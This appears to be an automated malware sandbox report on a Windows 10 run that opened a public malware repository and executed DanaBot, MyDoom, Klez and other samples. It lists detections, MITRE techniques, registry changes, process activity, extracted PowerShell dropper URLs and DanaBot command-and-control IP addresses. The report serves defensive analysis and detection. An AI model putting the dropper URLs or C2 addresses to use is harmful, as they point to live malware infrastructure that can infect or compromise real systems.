danabot | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Resubmissions

06-09-2024 09:35

240906-lkpy9szamb 10

06-09-2024 09:27

240906-leqzdayfqa 10

Analysis

max time kernel
480s
max time network
458s
platform
windows10-2004_x64
resource
win10v2004-20240802-es
resource tags

arch:x64arch:x86image:win10v2004-20240802-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
06-09-2024 09:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo

Score

10^/10

danabot mydoom banker botnet discovery evasion macro trojan upx worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Family

danabot

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain

Signatures

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot

Danabot x86 payload 1 IoCs

Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

botnet

Processes:

resource	yara_rule
behavioral1/files/0x0007000000023644-809.dat	family_danabot

Detects MyDoom family 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/6076-1336-0x00000000004A0000-0x00000000004AD000-memory.dmp	family_mydoom

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

systempropertiesadvanced.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0"	systempropertiesadvanced.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

systempropertiesadvanced.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	systempropertiesadvanced.exe

MyDoom
MyDoom is a Worm that is written in C++.
worm mydoom

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2100	5568	powershell.exe	140

Blocklisted process makes network request 14 IoCs

Processes:

rundll32.exepowershell.exe

flow	pid	Process
80	1280	rundll32.exe
94	2100	powershell.exe
97	2100	powershell.exe
99	2100	powershell.exe
100	1280	rundll32.exe
103	2100	powershell.exe
131	1280	rundll32.exe
158	1280	rundll32.exe
162	1280	rundll32.exe
164	1280	rundll32.exe
165	1280	rundll32.exe
166	1280	rundll32.exe
168	1280	rundll32.exe
169	1280	rundll32.exe

Suspicious Office macro 1 IoCs

Office document equipped with macros.

macro

Processes:

resource
behavioral1/files/0x000900000002364d-836.dat

ACProtect 1.3x - 1.4x DLL software 3 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
behavioral1/files/0x00080000000236b8-1332.dat	acprotect
behavioral1/memory/6076-1334-0x000000007E1A0000-0x000000007E1A7000-memory.dmp	acprotect
behavioral1/memory/6076-1338-0x000000007E1A0000-0x000000007E1A7000-memory.dmp	acprotect

Executes dropped EXE 6 IoCs

Processes:

DanaBot.exeMyDoom.A.exeKlez.e.exeWinkqjf.exeWindowsUpdate.exeWindows-KB2670838.msu.exe

pid	Process
5984	DanaBot.exe
6076	MyDoom.A.exe
5380	Klez.e.exe
2672	Winkqjf.exe
5228	WindowsUpdate.exe
3024	Windows-KB2670838.msu.exe

Loads dropped DLL 4 IoCs

Processes:

regsvr32.exerundll32.exeMyDoom.A.exe

pid	Process
3696	regsvr32.exe
1280	rundll32.exe
1280	rundll32.exe
6076	MyDoom.A.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x0007000000023562-1328.dat	upx
behavioral1/memory/6076-1329-0x00000000004A0000-0x00000000004AD000-memory.dmp	upx
behavioral1/files/0x00080000000236b8-1332.dat	upx
behavioral1/memory/6076-1334-0x000000007E1A0000-0x000000007E1A7000-memory.dmp	upx
behavioral1/memory/6076-1336-0x00000000004A0000-0x00000000004AD000-memory.dmp	upx
behavioral1/memory/6076-1338-0x000000007E1A0000-0x000000007E1A7000-memory.dmp	upx

Drops file in System32 directory 16 IoCs

Processes:

svchost.exeKlez.e.exeMyDoom.A.exeWinkqjf.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File opened for modification	C:\Windows\SysWOW64\Winkqjf.exe	Klez.e.exe
File created	C:\Windows\SysWOW64\Winkqjf.exe	Klez.e.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\SysWOW64\shimgapi.dll	MyDoom.A.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File opened for modification	C:\Windows\SysWOW64\Winkqjf.exe	Winkqjf.exe
File created	C:\Windows\SysWOW64\Winkqjf.exe	Winkqjf.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
4636	5984	WerFault.exe	131

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

regsvr32.exerundll32.exeMyDoom.A.exeKlez.e.exeWindowsUpdate.exeWindows-KB2670838.msu.exeDllHost.exeDanaBot.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MyDoom.A.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Klez.e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows-KB2670838.msu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DanaBot.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

explorer.exeWINWORD.EXE

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	explorer.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	explorer.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeWINWORD.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe

Modifies registry class 42 IoCs

Processes:

explorer.execontrol.exemspaint.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	control.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\WFlags = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\HotKey = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "18874369"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 1e00718000000000000000000000e4c006bb93d2754f8a90cb05b6477eee0000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "1"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 0c0001008421de39050000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f706806ee260aa0d7449371beb064c986830000	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000010000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "18874385"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	mspaint.exe

NTFS ADS 1 IoCs

Processes:

msedge.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Sin confirmar 744936.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 4 IoCs

Processes:

explorer.exevlc.exeWINWORD.EXE

pid	Process
5600	explorer.exe
5456	vlc.exe
2720	WINWORD.EXE
2720	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemspaint.exemsedge.exepowershell.exemsedge.exeWindowsUpdate.exe

pid	Process
3644	msedge.exe
3644	msedge.exe
1480	msedge.exe
1480	msedge.exe
560	identity_helper.exe
560	identity_helper.exe
5976	mspaint.exe
5976	mspaint.exe
5528	msedge.exe
5528	msedge.exe
2100	powershell.exe
2100	powershell.exe
2100	powershell.exe
3688	msedge.exe
3688	msedge.exe
3688	msedge.exe
3688	msedge.exe
5228	WindowsUpdate.exe
5228	WindowsUpdate.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

vlc.exe

pid	Process
5456	vlc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

Processes:

msedge.exe

pid	Process
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

control.exeexplorer.exe7zG.exe7zG.exepowershell.exeKlez.e.exeWinkqjf.exeWindows-KB2670838.msu.exe

description	pid	Process
Token: SeShutdownPrivilege	5524	control.exe
Token: SeCreatePagefilePrivilege	5524	control.exe
Token: SeShutdownPrivilege	5600	explorer.exe
Token: SeCreatePagefilePrivilege	5600	explorer.exe
Token: SeRestorePrivilege	1744	7zG.exe
Token: 35	1744	7zG.exe
Token: SeSecurityPrivilege	1744	7zG.exe
Token: SeSecurityPrivilege	1744	7zG.exe
Token: SeRestorePrivilege	5548	7zG.exe
Token: 35	5548	7zG.exe
Token: SeSecurityPrivilege	5548	7zG.exe
Token: SeSecurityPrivilege	5548	7zG.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeTcbPrivilege	5380	Klez.e.exe
Token: SeTcbPrivilege	2672	Winkqjf.exe
Token: SeDebugPrivilege	3024	Windows-KB2670838.msu.exe
Token: SeDebugPrivilege	3024	Windows-KB2670838.msu.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exeexplorer.exe

pid	Process
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
5600	explorer.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

msedge.exevlc.exeWindowsUpdate.exe

pid	Process
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
5456	vlc.exe
5456	vlc.exe
5456	vlc.exe
5228	WindowsUpdate.exe
5228	WindowsUpdate.exe
5228	WindowsUpdate.exe
5228	WindowsUpdate.exe
5228	WindowsUpdate.exe

Suspicious use of SetWindowsHookEx 20 IoCs

Processes:

mspaint.exeOpenWith.exevlc.exeWINWORD.EXE

pid	Process
5976	mspaint.exe
4144	OpenWith.exe
5456	vlc.exe
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE
2720	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	Process	procid_target
PID 1480 wrote to memory of 3064	1480	msedge.exe	83
PID 1480 wrote to memory of 3064	1480	msedge.exe	83
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 2424	1480	msedge.exe	84
PID 1480 wrote to memory of 3644	1480	msedge.exe	85
PID 1480 wrote to memory of 3644	1480	msedge.exe	85
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86
PID 1480 wrote to memory of 3884	1480	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
